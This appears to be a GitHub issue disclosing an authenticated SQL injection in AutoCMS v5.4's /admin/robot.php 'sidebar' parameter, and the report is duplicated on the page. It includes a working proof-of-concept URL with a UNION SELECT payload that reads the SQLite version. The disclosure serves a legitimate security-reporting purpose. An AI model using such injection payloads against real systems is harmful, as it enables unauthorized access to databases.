You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
AutoCMS v5.4 suffers from a SQL Injection vulnerability that can be exploited by an attacker with administrative privileges to execute arbitrary SQLite statements.
Details
The vulnerability is present in the sidebar parameter of the /admin/robot.php endpoint. An attacker with administrative privileges can leverage this issue to execute arbitrary SQLite statements on the database.
The following URL demonstrates the vulnerability by outputting the SQLite version: http://target-ip/admin/robot.php?edit=default&sidebar=-1' AND 1=2 UNION SELECT 1758999520,2,sqlite_version(),4,5 --
When this URL is accessed, the SQL injection payload is executed, and the server returns a page that includes the SQLite version information. The payload uses the UNION SELECT statement to retrieve the version, and the -- at the end comments out the rest of the original query, allowing the injected code to execute successfully.
POC
http://target-ip/admin/robot.php?edit=default&sidebar=-1' AND 1=2 UNION SELECT 1758999520,2,sqlite_version(),4,5 --
The text was updated successfully, but these errors were encountered:
Summary
AutoCMS v5.4 suffers from a SQL Injection vulnerability that can be exploited by an attacker with administrative privileges to execute arbitrary SQLite statements.
Details
The vulnerability is present in the
sidebarparameter of the/admin/robot.phpendpoint. An attacker with administrative privileges can leverage this issue to execute arbitrary SQLite statements on the database.The following URL demonstrates the vulnerability by outputting the SQLite version:
http://target-ip/admin/robot.php?edit=default&sidebar=-1' AND 1=2 UNION SELECT 1758999520,2,sqlite_version(),4,5 --When this URL is accessed, the SQL injection payload is executed, and the server returns a page that includes the SQLite version information. The payload uses the UNION SELECT statement to retrieve the version, and the -- at the end comments out the rest of the original query, allowing the injected code to execute successfully.
POC
http://target-ip/admin/robot.php?edit=default&sidebar=-1' AND 1=2 UNION SELECT 1758999520,2,sqlite_version(),4,5 --The text was updated successfully, but these errors were encountered: